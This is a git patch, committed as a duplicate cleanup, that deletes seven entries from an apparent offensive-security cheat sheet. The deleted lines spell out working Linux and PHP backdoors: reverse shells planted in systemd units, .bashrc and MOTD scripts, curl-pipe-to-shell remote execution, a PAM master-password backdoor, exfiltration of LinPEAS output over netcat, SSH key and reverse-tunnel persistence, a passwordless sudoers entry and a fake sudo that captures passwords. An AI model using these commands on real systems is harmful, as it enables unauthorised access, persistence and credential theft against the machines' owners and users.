From 6036b38f3521d59613036426c475c93158b3e10e Mon Sep 17 00:00:00 2001 From: Nicholas Ferreira Date: Thu, 26 Oct 2023 15:46:13 -0300 Subject: [PATCH] removed duplicates --- .../1698337732_backdoor_systemd_services.toml | 38 ------------------ entries/1698337732_bashrc_linux_backdoor.toml | 14 ------- entries/1698337732_linux_pam_backdoor.toml | 16 -------- entries/1698337732_linux_privesc_script.toml | 40 ------------------- entries/1698337732_simple_php_backdoors.toml | 34 ---------------- entries/1698337732_ssh_backdoors.toml | 40 ------------------- entries/1698337732_sudo_backdoors.toml | 17 -------- 7 files changed, 199 deletions(-) delete mode 100644 entries/1698337732_backdoor_systemd_services.toml delete mode 100644 entries/1698337732_bashrc_linux_backdoor.toml delete mode 100644 entries/1698337732_linux_pam_backdoor.toml delete mode 100644 entries/1698337732_linux_privesc_script.toml delete mode 100644 entries/1698337732_simple_php_backdoors.toml delete mode 100644 entries/1698337732_ssh_backdoors.toml delete mode 100644 entries/1698337732_sudo_backdoors.toml diff --git a/entries/1698337732_backdoor_systemd_services.toml b/entries/1698337732_backdoor_systemd_services.toml deleted file mode 100644 index 2be1529..0000000 --- a/entries/1698337732_backdoor_systemd_services.toml +++ /dev/null @@ -1,38 +0,0 @@ -title = "Systemd services backdoor" -description = "" -tags = ["linux", "backdoor"] -source = ["https://hosakacorp.net/p/systemd-user.html"] - -[[data]] -description = "Change and and run this script on the compromised machine. The backdoor will run whenever a user logs in into the server:" -language = "ini" -command = """#!/bin/sh -IP="" -PORT="" -SYSTEMD_PATH="/usr/lib/systemd/user/ $HOME/.local/share/systemd/user/ /etc/systemd/user/ $HOME/.config/systemd/user/ $XDG_RUNTIME_DIR/systemd/user/" -W_PATH="" -UNIT="voodoo.service" -UNIT_CONTENT="[Unit] -Description=Black magic happening, avert your eyes - -[Service] -RemainAfterExit=yes -Type=simple -ExecStart=/bin/bash -c \"exec 5<>/dev/tcp/$IP/$PORT; cat <&5 | while read line; do \$line 2>&5 >&5; done\" - -[Install] -WantedBy=default.target" - -for i in $SYSTEMD_PATH; do - mkdir -p "$i" - if [ -w "$i" ]; then W_PATH="${i%/} $W_PATH"; fi -done - -for k in $W_PATH; do - echo "$UNIT_CONTENT" > "$k/$UNIT" - echo "[*] created voodoo in '$k/$UNIT" -done - -systemctl --user daemon-reload -systemctl --user restart $UNIT > /dev/null -systemctl --user enable $UNIT""" \ No newline at end of file diff --git a/entries/1698337732_bashrc_linux_backdoor.toml b/entries/1698337732_bashrc_linux_backdoor.toml deleted file mode 100644 index c2ee3fb..0000000 --- a/entries/1698337732_bashrc_linux_backdoor.toml +++ /dev/null @@ -1,14 +0,0 @@ -title = "Bashrc backdoor" -description = "Get a reverse shell everytime a new terminal session is started" -tags = ["linux", "backdoor", "bash"] -source = [] - -[[data]] -description = "" -language = "bash" -command = """echo 'mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f' >> ~/.bashrc""" - -[[data]] -description = "Example executing remote commands via http:" -language = "bash" -command = """echo 'curl -sk https:///script.sh | sh' >> ~/.bashrc""" diff --git a/entries/1698337732_linux_pam_backdoor.toml b/entries/1698337732_linux_pam_backdoor.toml deleted file mode 100644 index 979073f..0000000 --- a/entries/1698337732_linux_pam_backdoor.toml +++ /dev/null @@ -1,16 +0,0 @@ -title = "Linux PAM backdoor" -description = "Log in into any user using a custom password (root required)" -tags = ["linux", "backdoor"] -source = ["https://github.com/zephrax/linux-pam-backdoor",https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9"] - -[[data]] -description = "PAM (Pluggable Authentication Modules) backdoor to log in into any user (root required):" -language = "bash" -command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc - -git clone https://github.com/zephrax/linux-pam-backdoor -#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases) -#PAM version should be compatible with the one on the target machine -./backdoor.sh -v 1.4.0 -p passw0rd -#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine. -#Now log in into any user using the password 'passw0rd'. The original user's password still works.""" diff --git a/entries/1698337732_linux_privesc_script.toml b/entries/1698337732_linux_privesc_script.toml deleted file mode 100644 index 9fc3731..0000000 --- a/entries/1698337732_linux_privesc_script.toml +++ /dev/null @@ -1,40 +0,0 @@ -title = "Internal enumeration for linux privilege escalation" -description = "Quickly get internal information and search for possible paths to escalate privileges" -tags = ["linux", "enum", "privesc"] -source = ["https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS"] - -[[data]] -description = "Run LinPEAS directly from memory:" -language = "bash" -command = """curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh""" - -[[data]] -description = "If you are on the same local network as the target:" -language = "bash" -command = """#Attacker: -sudo python3 -m http.server 80 - -#Target: -curl /linpeas.sh | sh -""" - -[[data]] -description = "Without curl:" -language = "bash" -command = """#Attacker: -sudo nc -q 5 -lvnp 80 < linpeas.sh - -#Target: -cat < /dev/tcp//80 | sh""" - -[[data]] -description = "Execute from memory and send output back to the attacker:" -language = "bash" -command = """#Attacker: -nc -lvnp 9002 | tee linpeas.out - -#Target: -curl :8000/linpeas.sh | sh | nc 10.10.14.20 9002 -# or -curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh | nc 9002 -""" diff --git a/entries/1698337732_simple_php_backdoors.toml b/entries/1698337732_simple_php_backdoors.toml deleted file mode 100644 index 81af552..0000000 --- a/entries/1698337732_simple_php_backdoors.toml +++ /dev/null @@ -1,34 +0,0 @@ -title = "PHP simple backdoors" -description = "" -tags = ["linux", "backdoor", "php"] -source = ["https://github.com/Nickguitar/YAPS"] - -[[data]] -description = "Web PHP backdoor. Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):" -language = "php" -command = """""" - -[[data]] -description = "Tiniest PHP backdoor possible:" -language = "php" -command = """#Run commands with example.com/backdoor.php?0=whoami -""" - -[[data]] -description = "YAPS (the most complete PHP reverse shell)" -language = "bash" -command = """#Upload it to the target machine -#https://github.com/Nickguitar/YAPS/raw/main/yaps.php -#Set up a listener on and run on the attacker's machine: -curl -x POST -d "x=:" example.com/yaps.php - -#If you got access with the previous backdoors (will keep your IP on webserver logs): -#Access example.com/backdoor.php?0=php+yaps.php++""" diff --git a/entries/1698337732_ssh_backdoors.toml b/entries/1698337732_ssh_backdoors.toml deleted file mode 100644 index f8792a4..0000000 --- a/entries/1698337732_ssh_backdoors.toml +++ /dev/null @@ -1,40 +0,0 @@ -title = "SSH backdoors" -description = "" -tags = ["linux", "backdoor", "ssh"] -source = ["https://medium.com/@sec_for_safety/ssh-backdoor-how-to-get-a-proper-shell-on-the-victims-machine-52d28fe6dde1"] - -[[data]] -description = "Add your public SSH key to the compromised user's ~/.ssh/authorized_keys file to mantain access." -language = "bash" -command = """#On your machine: -ssh-keygen -f ./id_rsa -cat id_rsa.pub #Copy the public key - -#On the compromised machine (substitute ): -echo '' >> ~/.ssh/authorized_keys - -# set the right permissions -chmod 700 ~/ -chmod 700 ~/.ssh -chmod 600 ~/.ssh/authorized_keys - -#Connect to the compromised machine with -ssh compromised-user@machine-ip -i id_rsa""" - -[[data]] -description = "Backdooring SSH message of the day. This will be run whenever someone logs in into the server via SSH (root required):" -language = "bash" -command = """echo -e '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f &' > /etc/update-motd.d/20-backdoor && chmod +x /etc/update-motd.d/20-backdoor""" - -[[data]] -description = "Reverse SSH tunnel backdoor (firewall bypass)" -language = "bash" -command = """# Run this on the compromised machine: -ssh -N -R 9999:localhost:22 attacker-user@attackerip - -# This will establish an SSH tunnel to the attacker's machine and forward any outgoing traffic from the attacker’s machine on localhost port 9999 back to the victim’s machine on port 22 localhost. -# Then, on the attacker's machine, run: -ssh -i ~/.ssh/id_rsa compromised-user@localhost -p 9999 - -#This will be a persistent backdoor. If you want to clean it, you just need to kill the process running on your own machine on port 9999.""" - diff --git a/entries/1698337732_sudo_backdoors.toml b/entries/1698337732_sudo_backdoors.toml deleted file mode 100644 index b915057..0000000 --- a/entries/1698337732_sudo_backdoors.toml +++ /dev/null @@ -1,17 +0,0 @@ -title = "Sudo backdoors" -description = "" -tags = ["linux", "backdoor", "sudo"] -source = ["https://github.com/nisay759/sudo-backdoor"] - -[[data]] -description = "Add your unprivileged user to sudoers (substitute ) (root required). This will give you permission to run any command as root with sudo." -language = "bash" -command = """echo ' ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers""" - -[[data]] -description = "Sudo backdoor for stealing passwords. This will mimics the original sudo binary behavior and gets the user's password. After downloading sudo.sh, edit the file and change 'localhost 31337' on the last lines to your ip and port to receive the information. You can also set up a webserver and curl the password to it:" -language = "bash" -command = """#Change /tmp/sudo if needed -wget https://raw.githubusercontent.com/nisay759/sudo-backdoor/master/sudo.sh -O /tmp/sudo -chmod +x /tmp/sudo -echo 'alias sudo="/tmp/sudo"' >> ~/.bashrc"""